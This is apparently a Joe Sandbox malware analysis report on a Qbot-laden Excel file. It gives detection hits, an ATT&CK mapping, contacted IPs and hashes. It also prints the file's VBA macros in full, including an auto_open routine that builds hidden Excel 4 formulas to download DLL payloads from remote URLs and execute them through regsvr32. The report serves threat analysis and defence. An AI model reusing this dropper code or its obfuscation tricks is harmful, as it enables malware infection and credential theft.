Source: Yara match	File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match	File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Scheduled Task/Job1	Process Injection413	Masquerading121	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting2	Logon Script (Windows)	Logon Script (Windows)	Modify Registry1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Native API3	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Exploitation for Client Execution32	Network Logon Script	Network Logon Script	Process Injection413	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting2	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://101.99.90.118/44474.9279916667.dat	100%	Avira URL Cloud	phishing
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.90.118/44474.9279916667.dat	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000005.00000002.594742750.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.595494652.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.646970896.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.645612767.0000000002320000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.724170254.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.722812935.0000000000890000.00000002.00020000.sdmp, reg.exe, 0000000F.00000002.726341911.0000000000830000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.123.53.199	unknown	unknown	133398	TELE-ASTeleAsiaLimitedHK	false
101.99.90.118	unknown	Malaysia	45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	false
194.36.191.21	unknown	Netherlands	60117	HSAE	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	497532
Start date:	05.10.2021
Start time:	22:15:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Rebate-690835286-10052021.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/6@0/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 23.5% (good quality ratio 22.3%) Quality average: 77.1% Quality standard deviation: 26.7%
HCA Information:	Successful, ratio: 79% Number of executed functions: 119 Number of non-executed functions: 65
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:18:09	API Interceptor	26x Sleep call for process: regsvr32.exe modified
22:18:10	API Interceptor	870x Sleep call for process: explorer.exe modified
22:18:12	API Interceptor	1x Sleep call for process: schtasks.exe modified
22:18:14	Task Scheduler	Run new task: tcrzbkfctd path: regsvr32.exe s>-s "C:\Users\user\Celod.wac2"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	GuestKey_.exe	Get hash	malicious	Browse	101.99.90.100
	438 .pdf.exe	Get hash	malicious	Browse	111.90.151.13
	svchost.exe	Get hash	malicious	Browse	101.99.90.100
	Suppression .xlsx	Get hash	malicious	Browse	101.99.94.139
	wh3i5mxzEW.exe	Get hash	malicious	Browse	101.99.94.139
	Claim-838392655-09242021.xls	Get hash	malicious	Browse	111.90.148.104
	claim.xls	Get hash	malicious	Browse	111.90.148.104
	Claim-1368769328-09242021.xls	Get hash	malicious	Browse	111.90.148.104
	Claim-1763045001-09242021.xls	Get hash	malicious	Browse	111.90.148.104
	Claim-680517779-09242021.xls	Get hash	malicious	Browse	111.90.148.104
	b82IlqpqKM.exe	Get hash	malicious	Browse	111.90.146.200
	AP.7.html	Get hash	malicious	Browse	111.90.141.112
	z6eCorPozO.exe	Get hash	malicious	Browse	111.90.151.16
	AP Remittance for bill.coleman@tetratech.com .html	Get hash	malicious	Browse	111.90.158.219
	aia8XaelyQ.exe	Get hash	malicious	Browse	111.90.151.16
	AP Remittance for tschlegelmilch@fmne.com .html	Get hash	malicious	Browse	111.90.158.219
	Evopayments.mx--77Fax.HTML	Get hash	malicious	Browse	111.90.139.60
	B68CWSIIIV.exe	Get hash	malicious	Browse	111.90.149.119
	46SGHijloy.exe	Get hash	malicious	Browse	101.99.94.158
	Secured Fax_healthesystems.com.htm	Get hash	malicious	Browse	111.90.158.219
TELE-ASTeleAsiaLimitedHK	Purchase Order.exe	Get hash	malicious	Browse	185.36.81.32
	sm3IX1O9SY.exe	Get hash	malicious	Browse	185.123.53.190
	5X23WRfhRS.exe	Get hash	malicious	Browse	185.123.53.190
	pwa3NHNVZW.exe	Get hash	malicious	Browse	185.123.53.190
	JC1oBQKLeZ.exe	Get hash	malicious	Browse	185.123.53.190
	322e2172b60d694797e91a98109d97e2b167953bb82f8.exe	Get hash	malicious	Browse	185.123.53.190
	CFk8TRCHMR.exe	Get hash	malicious	Browse	185.123.53.190
	krqKjxV4Vu.exe	Get hash	malicious	Browse	185.123.53.190
	gZw5shwW7a.exe	Get hash	malicious	Browse	185.123.53.190
	JC1oBQKLeZ.exe	Get hash	malicious	Browse	185.123.53.190
	llPhlwbDY0.exe	Get hash	malicious	Browse	185.123.53.190
	mHu8YsFcE4.exe	Get hash	malicious	Browse	185.123.53.190
	218ca7b5b0f838d6aa07bfcc350794954804d89d03d1e.exe	Get hash	malicious	Browse	185.123.53.190
	oZy4tc2qRb.exe	Get hash	malicious	Browse	185.123.53.190
	X9s8Bq26D6.exe	Get hash	malicious	Browse	185.123.53.190
	ecXVIbiFXw.exe	Get hash	malicious	Browse	185.123.53.190
	WLER42xEif.exe	Get hash	malicious	Browse	185.123.53.190
	xvDPA3IdQv.exe	Get hash	malicious	Browse	185.123.53.190
	bu1TvY9vnU.exe	Get hash	malicious	Browse	103.253.40.229
	unpacked.exe	Get hash	malicious	Browse	45.125.65.45

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1079808
Entropy (8bit):	5.319117353548221
Encrypted:	false
SSDEEP:	24576:Hgc9GxisYespQ90K5W44ZKtqcuALNLJ2PJgrUsROmbvbfgkqKhRwdkq11Jg:cisYxpg0vxgtqcuABLJ2PiIsROmjbfg4
MD5:	8F53FF8AA32159DDB9840D623F6AA0BC
SHA1:	C0735524F4EF5B1CA235C8BBA6E4D374B029727D
SHA-256:	E4152F6D3FA841D2A6B3B51D05DF2049615944B1B0E6CCA5BB6862C73B475C5F
SHA-512:	3643EBAF2E53686D05B7963BBBF5CBD889248257EEDD216BE7651275CCAB516CCF077AD598335CA8B9E1F9B5A04D5D3957450F42AA3D214C29EC60C8FA83E861
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.u.@.&.@.&.@.&-.>&.@.&-.?&.@.&.-&.@.&.-&.@.&.@.&L@.&./&.@.&.,&.@.&.0&.@.&.(&.@.&.1&.@.&..&.@.&Rich.@.&........................PE..L.....]...........!.................T....... ...............................P......d.....@..........................N......HO..P.... ..X....................0..<....;..T............................;..@............ ..\............................text............................... ..`.rdata..L7... ...8..................@..@.data........`.......J..............@....rsrc...X.... .......V..............@..@.reloc..<....0.......\..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.254452117671748
Encrypted:	false
SSDEEP:	1536:C6QL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CBJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	8E86CE9D31D62DC50AB9A01D3D5057C1
SHA1:	8010541F22558F1488357B074CC88086374658F7
SHA-256:	5C8DD6401D8899A50D856E92D7CDA3568648670378AD954EF5B4BD236357D3E0
SHA-512:	ED812AAE4A3644179B511EE36EE32D4AC2EC6CDD437A693434B3EF292B08FF452FD50766B3689FDD3AACD1045E1BDC4D1C359D28C3B02D655C7A94C58920DF2D
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	15676
Entropy (8bit):	4.534394952338633
Encrypted:	false
SSDEEP:	192:QxlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:Q38xesT20lheZ3waE5D7qxIxkxe
MD5:	DB5C4EB0299CF4552DE5F7AB2D385DAA
SHA1:	2C97E4B5B6A44D612B26D0BF2101B3F582558442
SHA-256:	610D7ECE38879EB319C3D62C5E9EB40286FAF9FC13D3C3C3ABA9DD01EF9DC92E
SHA-512:	72D67A93A9243D7C85BAFA911655A694B0F5C861B1E474CEEE9483931445B76E8BD149DF058BD6D7E67250151C880646FAC6ADBB7FD14ACC58BF9C2371653E8E
Malicious:	false
Preview:	MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................k..L.)>_Z............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......\|...K..a...

C:\Users\user\Celod.wac2 Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	5.089709808966982
Encrypted:	false
SSDEEP:	96:i/eulIv2+nkLk2SHGSj3CKie2Hf1THOXgsc:i/DIv9nkrSHGSjy3/1Tuc
MD5:	7EFD8C8717A819F397522C439ABB5BD1
SHA1:	2A4CA1DD5C5CDDD0791B555D2E41484D4DC24DA8
SHA-256:	5FAACB2C83E51C6673161FFAF73C4594F4D8238920785678A1B64C3811FE19F3
SHA-512:	6E0388DD47B4B2AF73385371C95EA7BB01A51E27976C5289D2DFBCCF856B712FF3490D1B8EB4A49BA703F7BFCE9F09886BD61ABC56AE4145ED4135F30E602EE5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.u.@.&.@.&.@.&-.>&.@.&-.?&.@.&.-&.@.&.-&.@.&.@.&L@.&./&.@.&.,&.@.&.0&.@.&.(&.@.&.1&.@.&..&.@.&Rich.@.&........................PE..L.....]...........!.................T....... ...............................P......d.....@..........................N......HO..P.... ..X....................0..<....;..T............................;..@............ ..\............................text............................... ..`.rdata..L7... ...8..................@..@.data........`.......J..............@....rsrc...X.... .......V..............@..@.reloc..<....0.......\..............@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Oct 5 09:11:15 2021, Security: 0
Entropy (8bit):	7.071348783430154
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Rebate-690835286-10052021.xls
File size:	133120
MD5:	1513c88677fc7fa1994a59197ebdb528
SHA1:	b4b9486e65b90c10c2e0bd1c3617771ccec0a335
SHA256:	7eaf061ea660be58767918cb80fb98da9c348be2b2449836bf840cfbf12882ec
SHA512:	0892245dbce9af97dfdd42bf22a1db13d1a7d8b5d135f1028f9e81c82f169cf114040ed5a4b68ac2fc88cbca9e6fc163110cca791dc09753ae0f7a2abe67c069
SSDEEP:	3072:gk3hOdsylKlgxopeiBNhZFGzE+cL2kdAdc6YehWfGutUHKGDbpmsiiZu6NC06v6R:gk3hOdsylKlgxopeiBNhZF+E+W2kdAdp
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Rebate-690835286-10052021.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	Test
Last Saved By:	Test
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2021-10-05 08:11:15
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2BEEDB10-702C-4639-85B4-348EEF57BA36}{68EBBE76-267A-4441-B0C5-391CDE4F754A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: Module1, Stream Size: 2154

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module1
VBA File Name:	Module1
Stream Size:	2154
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 ec 06 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Application.ScreenUpdating = False
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheettt"
Sheets("Sheettt").Visible = False
Nyrtyfh
Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption
End Function
Sub auto_close()


Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheettt").Delete
   Application.DisplayAlerts = True

End Sub

Function Nyrtyfh()
Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite

End Function

VBA File Name: Module5, Stream Size: 3434

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module5
VBA File Name:	Module5
Stream Size:	3434
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 f0 00 00 00 82 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 02 00 00 15 0b 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "R" & "E" & "G" & "I" & "STER"
Drezden = "="
Naret = "" & "E" & "" & "X" & "" & "E" & "" & "C"
DUJSKFASD = UserForm2.Blost.Caption
jgfjgjfhfhf


Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()"
Sheets("Sheettt").Range("K18") = ".d" & "a" & "t"



Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()"
Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
Sheets("Sheettt").Range("I10") = UserForm2.Caption
Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheettt").Range("I12") = "Byukilos"
Sheets("Sheettt").Range("G10") = "..\Celod.wac"
Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
Sheets("Sheettt").Range("G10") = "..\Celod.wac"
Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
Sheets("Sheettt").Range("I17") = DUJSKFASD
Sheets("Sheettt").Range("I18") = DUJSKFASD & "1"
Sheets("Sheettt").Range("I19") = DUJSKFASD & "2"
Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheettt").Range("H1")

End Sub

VBA File Name: Sheet1, Stream Size: 991

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook, Stream Size: 3459

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook
Stream Size:	3459
Data ASCII:	. . . . . . . . . 2 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 32 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 04 00 00 b1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
    On Error Resume Next
Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
